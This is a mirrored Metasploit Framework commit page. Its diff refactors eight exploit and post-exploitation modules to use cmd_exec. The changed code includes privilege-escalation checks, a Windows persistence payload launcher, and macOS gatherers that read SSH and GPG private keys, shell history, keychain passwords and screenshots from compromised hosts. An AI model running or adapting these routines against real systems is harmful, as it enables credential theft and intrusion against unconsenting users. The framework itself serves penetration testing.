infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #5581, s/shell_command_token/cmd_exec/

bug/bundler_fix
William Vu 2015-06-26 16:59:40 -05:00
parent a10fa02b00 12188f1a00
commit 326bec0a1f
No known key found for this signature in database
GPG Key ID: 68BD00CE25866743
8 changed files with 130 additions and 129 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
modules/exploits/freebsd/local/mmap.rb
View File

@ -55,7 +55,7 @@ class Metasploit4 < Msf::Exploit::Local
end
def check
res = session.shell_command_token("uname -a")
res = cmd_exec('uname -a')
return Exploit::CheckCode::Appears if res =~ /FreeBSD 9\.[01]/
Exploit::CheckCode::Safe

2
modules/exploits/osx/local/setuid_tunnelblick.rb
View File

@ -61,7 +61,7 @@ class Metasploit4 < Msf::Exploit::Local
return CheckCode::Safe
end
check = session.shell_command_token("find #{datastore["Tunnelblick"]} -type f -user root -perm -4000")
check = cmd_exec("find #{datastore["Tunnelblick"]} -type f -user root -perm -4000")
if check =~ /openvpnstart/
return CheckCode::Vulnerable

2
modules/exploits/osx/local/setuid_viscosity.rb
View File

@ -61,7 +61,7 @@ class Metasploit4 < Msf::Exploit::Local
return CheckCode::Safe
end
check = session.shell_command_token("find #{datastore["Viscosity"]} -type f -user root -perm -4000")
check = cmd_exec("find #{datastore["Viscosity"]} -type f -user root -perm -4000")
if check =~ /ViscosityHelper/
return CheckCode::Vulnerable

4
modules/exploits/windows/local/persistence.rb
View File

@ -230,9 +230,9 @@ class Metasploit4 < Msf::Exploit::Local
# Error handling for process.execute() can throw a RequestError in send_request.
begin
unless datastore['EXE::Custom']
session.shell_command_token(script_on_target)
cmd_exec("wscript \"#{script_on_target}\"")
else
session.shell_command_token("cscript \"#{script_on_target}\"")
cmd_exec("cscript \"#{script_on_target}\"")
end
rescue
print_error("Failed to execute payload on target")

50
modules/post/multi/gather/enum_vbox.rb
View File

@ -16,10 +16,10 @@ class Metasploit3 < Msf::Post
super( update_info(info,
'Name' => 'Multi Gather VirtualBox VM Enumeration',
'Description' => %q{
This module will attempt to enumerate any VirtualBox VMs on the target machine.
Due to the nature of VirtualBox, this module can only enumerate VMs registered
for the current user, thereforce, this module needs to be invoked from a user context.
},
This module will attempt to enumerate any VirtualBox VMs on the target machine.
Due to the nature of VirtualBox, this module can only enumerate VMs registered
for the current user, thereforce, this module needs to be invoked from a user context.
},
'License' => MSF_LICENSE,
'Author' => ['theLightCosine'],
'Platform' => %w{ bsd linux osx unix win },
@ -29,27 +29,37 @@ class Metasploit3 < Msf::Post
def run
if session.platform =~ /win/
res = session.shell_command_token_win32('"c:\Program Files\Oracle\VirtualBox\vboxmanage" list -l vms') || ''
if res.include? "The system cannot find the path specified"
print_error "VirtualBox does not appear to be installed on this machine"
return nil
elsif res == "\n"
print_status "VirtualBox is installed but this user has no VMs registered. Try another user."
return nil
if session.type == 'meterpreter'
begin
res = cmd_exec('c:\\Program Files\\Oracle\\VirtualBox\\vboxmanage', 'list -l vms')
rescue ::Rex::Post::Meterpreter::RequestError
print_error('VirtualBox does not appear to be installed on this machine')
return nil
end
if res.empty?
print_status('VirtualBox is installed but this user has no VMs registered. Try another user.')
return nil
end
else
res = cmd_exec('"c:\\Program Files\\Oracle\\VirtualBox\\vboxmanage" list -l vms')
if res.empty?
print_error('VirtualBox isn\'t installed or this user has no VMs registered')
return nil
end
end
elsif session.platform =~ /unix|linux|bsd|osx/
res = session.shell_command('vboxmanage list -l vms')
unless res.start_with? "Sun VirtualBox"
print_error "VirtualBox does not appear to be installed on this machine"
return nil
end
unless res.include? "Name:"
print_status "VirtualBox is installed but this user has no VMs registered. Try another user."
res = cmd_exec('vboxmanage list -l vms')
unless res.start_with?('Sun VirtualBox') || res.include?('Name:')
print_error('VirtualBox isn\'t installed or this user has no VMs registered')
return nil
end
end
print_good res
store_loot('virtualbox_vms', "text/plain", session, res, "virtualbox_vms.txt", "Virtualbox Virtual Machines")
vprint_status(res)
store_path = store_loot('virtualbox_vms', "text/plain", session, res, "virtualbox_vms.txt", "Virtualbox Virtual Machines")
print_good("#{peer} - File successfully retrieved and saved on #{store_path}")
end

2
modules/post/multi/gather/env.rb
View File

@ -42,7 +42,7 @@ class Metasploit3 < Msf::Post
@ltype = "unix.environment"
cmd = "env"
end
@output = session.shell_command_token(cmd)
@output = cmd_exec(cmd)
end
def get_env_meterpreter

12
modules/post/osx/gather/enum_keychain.rb
View File

@ -29,16 +29,16 @@ class Metasploit3 < Msf::Post
end
def list_keychains
keychains = session.shell_command_token("security list")
user = session.shell_command_token("whoami")
keychains = cmd_exec("security list")
user = cmd_exec("whoami")
print_status("The following keychains for #{user.strip} were found:")
print_line(keychains.chomp)
return keychains =~ /No such file or directory/ ? nil : keychains
end
def enum_accounts(keychains)
user = session.shell_command_token("whoami").chomp
out = session.shell_command_token("security dump | egrep 'acct|desc|srvr|svce'")
user = cmd_exec("whoami").chomp
out = cmd_exec("security dump | egrep 'acct|desc|srvr|svce'")
i = 0
accounts = {}
@ -73,7 +73,7 @@ class Metasploit3 < Msf::Post
s = accounts[num]["svce"]
end
cmd = session.shell_command_token("security #{c} -ga \"#{accounts[num]["acct"]}\" -s \"#{s}\" 2>&1")
cmd = cmd_exec("security #{c} -ga \"#{accounts[num]["acct"]}\" -s \"#{s}\" 2>&1")
cmd.split("\n").each do |line|
if line =~ /password: /
@ -109,7 +109,7 @@ class Metasploit3 < Msf::Post
return
end
user = session.shell_command_token("/usr/bin/whoami").chomp
user = cmd_exec("/usr/bin/whoami").chomp
accounts = enum_accounts(keychains)
save(accounts)

185
modules/post/osx/gather/enum_osx.rb
View File

@ -33,22 +33,22 @@ class Metasploit3 < Msf::Post
when /meterpreter/
host = sysinfo["Computer"]
when /shell/
host = session.shell_command_token("hostname").chomp
host = cmd_exec("hostname").chomp
end
print_status("Running module against #{host}")
running_root = check_root
if running_root
print_status("This session is running as root!")
end
ver_num = get_ver
log_folder = log_folder_create()
log_folder = log_folder_create
enum_conf(log_folder)
enum_accounts(log_folder, ver_num)
get_crypto_keys(log_folder)
screenshot(log_folder, ver_num)
dump_bash_history(log_folder)
get_keychains(log_folder)
end
#parse the dslocal plist in lion
@ -86,19 +86,19 @@ class Metasploit3 < Msf::Post
#Get hostname
case session.type
when /meterpreter/
host = Rex::FileUtils.clean_path(sysinfo["Computer"])
host = Rex::FileUtils.clean_path(sysinfo['Computer'])
when /shell/
host = Rex::FileUtils.clean_path(session.shell_command_token("hostname").chomp)
host = Rex::FileUtils.clean_path(cmd_exec('hostname').chomp)
end
# Create Filename info to be appended to downloaded files
filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")
file_name_info = '_' + ::Time.now.strftime('%Y%m%d.%M%S')
# Create a directory for the logs
if log_path
logs = ::File.join(log_path, 'logs', "enum_osx", host + filenameinfo )
logs = ::File.join(log_path, 'logs', 'enum_osx', host + file_name_info )
else
logs = ::File.join(Msf::Config.log_directory, "post", "enum_osx", host + filenameinfo )
logs = ::File.join(Msf::Config.log_directory, 'post', 'enum_osx', host + file_name_info )
end
# Create the log directory
@ -111,10 +111,11 @@ class Metasploit3 < Msf::Post
# Get only the account ID
case session.type
when /shell/
id = session.shell_command_token("/usr/bin/id -ru").chomp
id = cmd_exec("/usr/bin/id -ru").chomp
when /meterpreter/
id = cmd_exec("/usr/bin/id","-ru").chomp
id = cmd_exec("/usr/bin/id", "-ru").chomp
end
if id == "0"
return true
else
@ -129,7 +130,7 @@ class Metasploit3 < Msf::Post
when /meterpreter/
osx_ver = cmd_exec("/usr/bin/sw_vers", "-productName").chomp
when /shell/
osx_ver = session.shell_command_token("/usr/bin/sw_vers -productName").chomp
osx_ver = cmd_exec("/usr/bin/sw_vers -productName").chomp
end
if osx_ver =~/Server/
return true
@ -143,60 +144,57 @@ class Metasploit3 < Msf::Post
# Get the OS Version
case session.type
when /meterpreter/
osx_ver_num = cmd_exec("/usr/bin/sw_vers", "-productVersion").chomp
osx_ver_num = cmd_exec('/usr/bin/sw_vers', '-productVersion').chomp
when /shell/
osx_ver_num = session.shell_command_token("/usr/bin/sw_vers -productVersion").chomp
osx_ver_num = cmd_exec('/usr/bin/sw_vers -productVersion').chomp
end
return osx_ver_num
end
def enum_conf(log_folder)
platform_type = session.platform
session_type = session.type
profile_datatypes = {"OS" => "SPSoftwareDataType",
"Network" => "SPNetworkDataType",
"Bluetooth" => "SPBluetoothDataType",
"Ethernet" => "SPEthernetDataType",
"Printers" => "SPPrintersDataType",
"USB" => "SPUSBDataType",
"Airport" => "SPAirPortDataType",
"Firewall" => "SPFirewallDataType",
"Known Networks" => "SPNetworkLocationDataType",
"Applications" => "SPApplicationsDataType",
"Development Tools" => "SPDeveloperToolsDataType",
"Frameworks" => "SPFrameworksDataType",
"Logs" => "SPLogsDataType",
"Preference Panes" => "SPPrefPaneDataType",
"StartUp" => "SPStartupItemDataType"}
profile_datatypes = {
'OS' => 'SPSoftwareDataType',
'Network' => 'SPNetworkDataType',
'Bluetooth' => 'SPBluetoothDataType',
'Ethernet' => 'SPEthernetDataType',
'Printers' => 'SPPrintersDataType',
'USB' => 'SPUSBDataType',
'Airport' => 'SPAirPortDataType',
'Firewall' => 'SPFirewallDataType',
'Known Networks' => 'SPNetworkLocationDataType',
'Applications' => 'SPApplicationsDataType',
'Development Tools' => 'SPDeveloperToolsDataType',
'Frameworks' => 'SPFrameworksDataType',
'Logs' => 'SPLogsDataType',
'Preference Panes' => 'SPPrefPaneDataType',
'StartUp' => 'SPStartupItemDataType'
}
shell_commands = {
"TCP Connections" => ["/usr/sbin/netstat","-np tcp"],
"UDP Connections" => ["/usr/sbin/netstat","-np udp"],
"Environment Variables" => ["/usr/bin/printenv",""],
"Last Boottime" => ["/usr/bin/who","-b"],
"Current Activity" => ["/usr/bin/who",""],
"Process List" => ["/bin/ps","-ea"]
'TCP Connections' => ['/usr/sbin/netstat', '-np tcp'],
'UDP Connections' => ['/usr/sbin/netstat', '-np udp'],
'Environment Variables' => ['/usr/bin/printenv', ''],
'Last Boottime' => ['/usr/bin/who', '-b'],
'Current Activity' => ['/usr/bin/who', ''],
'Process List' => ['/bin/ps', '-ea']
}
print_status("Saving all data to #{log_folder}")
# Enumerate first using System Profiler
profile_datatypes.each do |name,profile_datatypes|
profile_datatypes.each do |name, profile_datatypes|
print_status("\tEnumerating #{name}")
# Run commands according to the session type
if session_type =~ /meterpreter/
returned_data = cmd_exec("system_profiler",profile_datatypes)
returned_data = cmd_exec('system_profiler', profile_datatypes)
# Save data lo log folder
file_local_write(log_folder+"//#{name}.txt",returned_data)
elsif session_type =~ /shell/
begin
returned_data = session.shell_command_token("/usr/sbin/system_profiler #{profile_datatypes}",15)
returned_data = cmd_exec("/usr/sbin/system_profiler #{profile_datatypes}", 15)
# Save data lo log folder
file_local_write(log_folder+"//#{name}.txt",returned_data)
rescue
@ -207,20 +205,14 @@ class Metasploit3 < Msf::Post
# Enumerate using system commands
shell_commands.each do |name, command|
print_status("\tEnumerating #{name}")
# Run commands according to the session type
begin
if session_type =~ /meterpreter/
command_output = cmd_exec(command[0],command[1])
# Save data lo log folder
file_local_write(log_folder+"//#{name}.txt",command_output)
elsif session_type =~ /shell/
command_output = session.shell_command_token(command.join(" "),15)
command_output = cmd_exec(command[0], command[1])
# Save data lo log folder
file_local_write(log_folder+"//#{name}.txt",command_output)
end
@ -235,17 +227,16 @@ class Metasploit3 < Msf::Post
# Specific commands for Leopard and Snow Leopard
leopard_commands = {
"Users" => ["/usr/bin/dscacheutil","-q user"],
"Groups" => ["/usr/bin/dscacheutil","-q group"]
}
'Users' => ['/usr/bin/dscacheutil', '-q user'],
'Groups' => ['/usr/bin/dscacheutil', '-q group']
}
# Specific commands for Tiger
tiger_commands = {
"Users" => ["/usr/sbin/lookupd","-q user"],
"Groups" => ["/usr/sbin/lookupd","-q group"]
'Users' => ['/usr/sbin/lookupd', '-q user'],
'Groups' => ['/usr/sbin/lookupd', '-q group']
}
}
if ver_num =~ /10\.(7|6|5)/
shell_commands = leopard_commands
else
@ -257,17 +248,17 @@ class Metasploit3 < Msf::Post
# Run commands according to the session type
if session.type =~ /meterpreter/
command_output = cmd_exec(command[0],command[1])
command_output = cmd_exec(command[0], command[1])
# Save data lo log folder
file_local_write(log_folder+"//#{name}.txt",command_output)
file_local_write(log_folder+"//#{name}.txt", command_output)
elsif session.type =~ /shell/
command_output = session.shell_command_token(command.join(" "),15)
command_output = cmd_exec(command.join(' '), 15)
# Save data lo log folder
file_local_write(log_folder+"//#{name}.txt",command_output)
file_local_write(log_folder + "//#{name}.txt", command_output)
end
end
@ -284,16 +275,16 @@ class Metasploit3 < Msf::Post
if not check_root
# Enumerate the home folder content
home_folder_list = session.shell_command_token("/bin/ls -ma ~/").chomp.split(", ")
home_folder_list = cmd_exec("/bin/ls -ma ~/").chomp.split(", ")
# Check for SSH folder and extract keys if found
if home_folder_list.include?("\.ssh")
print_status(".ssh Folder is present")
ssh_folder = session.shell_command_token("/bin/ls -ma ~/.ssh").chomp.split(", ")
ssh_folder = cmd_exec("/bin/ls -ma ~/.ssh").chomp.split(", ")
ssh_folder.each do |k|
next if k =~/^\.$|^\.\.$/
print_status("\tDownloading #{k.strip}")
ssh_file_content = session.shell_command_token("/bin/cat ~/.ssh/#{k}")
ssh_file_content = cmd_exec("/bin/cat ~/.ssh/#{k}")
# Save data lo log folder
file_local_write(log_folder+"//#{name}",ssh_file_content)
@ -303,14 +294,14 @@ class Metasploit3 < Msf::Post
# Check for GPG and extract keys if found
if home_folder_list.include?("\.gnupg")
print_status(".gnupg Folder is present")
gnugpg_folder = session.shell_command_token("/bin/ls -ma ~/.gnupg").chomp.split(", ")
gnugpg_folder = cmd_exec("/bin/ls -ma ~/.gnupg").chomp.split(", ")
gnugpg_folder.each do |k|
next if k =~/^\.$|^\.\.$/
print_status("\tDownloading #{k.strip}")
gpg_file_content = session.shell_command_token("/bin/cat ~/.gnupg/#{k.strip}")
gpg_file_content = cmd_exec("/bin/cat ~/.gnupg/#{k.strip}")
# Save data lo log folder
file_local_write(log_folder+"//#{name}",gpg_file_content)
file_local_write(log_folder+"//#{name}", gpg_file_content)
end
end
else
@ -319,7 +310,7 @@ class Metasploit3 < Msf::Post
when /meterpreter/
users_folder = cmd_exec("/bin/ls","/Users")
when /shell/
users_folder = session.shell_command_token("/bin/ls /Users")
users_folder = cmd_exec("/bin/ls /Users")
end
users_folder.each_line do |u|
next if u.chomp =~ /Shared|\.localized/
@ -327,14 +318,14 @@ class Metasploit3 < Msf::Post
end
users.each do |u|
user_folder = session.shell_command_token("/bin/ls -ma /Users/#{u}/").chomp.split(", ")
user_folder = cmd_exec("/bin/ls -ma /Users/#{u}/").chomp.split(", ")
if user_folder.include?("\.ssh")
print_status(".ssh Folder is present for #{u}")
ssh_folder = session.shell_command_token("/bin/ls -ma /Users/#{u}/.ssh").chomp.split(", ")
ssh_folder = cmd_exec("/bin/ls -ma /Users/#{u}/.ssh").chomp.split(", ")
ssh_folder.each do |k|
next if k =~/^\.$|^\.\.$/
print_status("\tDownloading #{k.strip}")
ssh_file_content = session.shell_command_token("/bin/cat /Users/#{u}/.ssh/#{k}")
ssh_file_content = cmd_exec("/bin/cat /Users/#{u}/.ssh/#{k}")
# Save data lo log folder
file_local_write(log_folder+"//#{name}",ssh_file_content)
@ -344,14 +335,14 @@ class Metasploit3 < Msf::Post
users.each do |u|
user_folder = session.shell_command_token("/bin/ls -ma /Users/#{u}/").chomp.split(", ")
user_folder = cmd_exec("/bin/ls -ma /Users/#{u}/").chomp.split(", ")
if user_folder.include?("\.ssh")
print_status(".gnupg Folder is present for #{u}")
ssh_folder = session.shell_command_token("/bin/ls -ma /Users/#{u}/.gnupg").chomp.split(", ")
ssh_folder = cmd_exec("/bin/ls -ma /Users/#{u}/.gnupg").chomp.split(", ")
ssh_folder.each do |k|
next if k =~/^\.$|^\.\.$/
print_status("\tDownloading #{k.strip}")
ssh_file_content = session.shell_command_token("/bin/cat /Users/#{u}/.gnupg/#{k}")
ssh_file_content = cmd_exec("/bin/cat /Users/#{u}/.gnupg/#{k}")
# Save data lo log folder
file_local_write(log_folder+"//#{name}",ssh_file_content)
@ -371,22 +362,22 @@ class Metasploit3 < Msf::Post
if check_root
print_status("Capturing screenshot for each loginwindow process since privilege is root")
if session.type =~ /shell/
loginwindow_pids = session.shell_command_token("/bin/ps aux \| /usr/bin/awk \'/name/ \&\& \!/awk/ \{print \$2\}\'").split("\n")
loginwindow_pids = cmd_exec("/bin/ps aux \| /usr/bin/awk \'/name/ \&\& \!/awk/ \{print \$2\}\'").split("\n")
loginwindow_pids.each do |pid|
print_status("\tCapturing for PID:#{pid}")
session.shell_command_token("/bin/launchctl bsexec #{pid} /usr/sbin/screencapture -x /tmp/#{pid}.jpg")
file_local_write(log_folder+"//screenshot_#{pid}.jpg",
session.shell_command_token("/bin/cat /tmp/#{pid}.jpg"))
session.shell_command_token("/usr/bin/srm -m -z /tmp/#{pid}.jpg")
cmd_exec("/bin/launchctl bsexec #{pid} /usr/sbin/screencapture -x /tmp/#{pid}.jpg")
file_local_write(log_folder + "//screenshot_#{pid}.jpg",
cmd_exec("/bin/cat /tmp/#{pid}.jpg"))
cmd_exec("/usr/bin/srm -m -z /tmp/#{pid}.jpg")
end
end
else
# Run commands according to the session type
if session.type =~ /shell/
session.shell_command_token("/usr/sbin/screencapture -x /tmp/#{picture_name}.jpg")
cmd_exec("/usr/sbin/screencapture -x /tmp/#{picture_name}.jpg")
file_local_write(log_folder+"//screenshot.jpg",
session.shell_command_token("/bin/cat /tmp/#{picture_name}.jpg"))
session.shell_command_token("/usr/bin/srm -m -z /tmp/#{picture_name}.jpg")
cmd_exec("/bin/cat /tmp/#{picture_name}.jpg"))
cmd_exec("/usr/bin/srm -m -z /tmp/#{picture_name}.jpg")
end
end
print_status("Screenshot Captured")
@ -403,8 +394,8 @@ class Metasploit3 < Msf::Post
users_folder = cmd_exec("/bin/ls","/Users").chomp
current_user = cmd_exec("/usr/bin/id","-nu").chomp
when /shell/
users_folder = session.shell_command_token("/bin/ls /Users").chomp
current_user = session.shell_command_token("/usr/bin/id -nu").chomp
users_folder = cmd_exec("/bin/ls /Users").chomp
current_user = cmd_exec("/usr/bin/id -nu").chomp
end
users_folder.each_line do |u|
next if u.chomp =~ /Shared|\.localized/
@ -415,12 +406,12 @@ class Metasploit3 < Msf::Post
if current_user == "root"
# Check the root user folder
root_folder = session.shell_command_token("/bin/ls -ma ~/").chomp.split(", ")
root_folder = cmd_exec("/bin/ls -ma ~/").chomp.split(", ")
root_folder.each do |f|
if f =~ /\.\w*\_history/
print_status("\tHistory file #{f.strip} found for root")
print_status("\tDownloading #{f.strip}")
sh_file = session.shell_command_token("/bin/cat ~/#{f.strip}")
sh_file = cmd_exec("/bin/cat ~/#{f.strip}")
# Save data lo log folder
file_local_write(log_folder+"//root_#{f.strip}.txt",sh_file)
@ -431,12 +422,12 @@ class Metasploit3 < Msf::Post
users.each do |u|
# Lets get a list of all the files on the users folder and place them in an array
user_folder = session.shell_command_token("/bin/ls -ma /Users/#{u}/").chomp.split(", ")
user_folder = cmd_exec("/bin/ls -ma /Users/#{u}/").chomp.split(", ")
user_folder.each do |f|
if f =~ /\.\w*\_history/
print_status("\tHistory file #{f.strip} found for #{u}")
print_status("\tDownloading #{f.strip}")
sh_file = session.shell_command_token("/bin/cat /Users/#{u}/#{f.strip}")
sh_file = cmd_exec("/bin/cat /Users/#{u}/#{f.strip}")
# Save data lo log folder
file_local_write(log_folder+"//#{u}_#{f.strip}.txt",sh_file)
@ -445,12 +436,12 @@ class Metasploit3 < Msf::Post
end
else
current_user_folder = session.shell_command_token("/bin/ls -ma ~/").chomp.split(", ")
current_user_folder = cmd_exec("/bin/ls -ma ~/").chomp.split(", ")
current_user_folder.each do |f|
if f =~ /\.\w*\_history/
print_status("\tHistory file #{f.strip} found for #{current_user}")
print_status("\tDownloading #{f.strip}")
sh_file = session.shell_command_token("/bin/cat ~/#{f.strip}")
sh_file = cmd_exec("/bin/cat ~/#{f.strip}")
# Save data lo log folder
file_local_write(log_folder+"//#{current_user}_#{f.strip}.txt",sh_file)
@ -466,7 +457,7 @@ class Metasploit3 < Msf::Post
when /meterpreter/
users_folder = cmd_exec("/bin/ls","/Users").chomp
when /shell/
users_folder = session.shell_command_token("/bin/ls /Users").chomp
users_folder = cmd_exec("/bin/ls /Users").chomp
end
users_folder.each_line do |u|
next if u.chomp =~ /Shared|\.localized/
@ -475,22 +466,22 @@ class Metasploit3 < Msf::Post
if check_root
users.each do |u|
print_status("Enumerating and Downloading keychains for #{u}")
keychain_files = session.shell_command_token("/usr/bin/sudo -u #{u} -i /usr/bin/security list-keychains").split("\n")
keychain_files = cmd_exec("/usr/bin/sudo -u #{u} -i /usr/bin/security list-keychains").split("\n")
keychain_files.each do |k|
keychain_file = session.shell_command_token("/bin/cat #{k.strip}")
keychain_file = cmd_exec("/bin/cat #{k.strip}")
# Save data lo log folder
file_local_write(log_folder+"//#{u}#{k.strip.gsub(/\W/,"_")}",keychain_file)
end
end
else
current_user = session.shell_command_token("/usr/bin/id -nu").chomp
current_user = cmd_exec("/usr/bin/id -nu").chomp
print_status("Enumerating and Downloading keychains for #{current_user}")
keychain_files = session.shell_command_token("usr/bin/security list-keychains").split("\n")
keychain_files = cmd_exec("usr/bin/security list-keychains").split("\n")
keychain_files.each do |k|
keychain_file = session.shell_command_token("/bin/cat #{k.strip}")
keychain_file = cmd_exec("/bin/cat #{k.strip}")
# Save data lo log folder
file_local_write(log_folder+"//#{current_user}#{k.strip.gsub(/\W/,"_")}",keychain_file)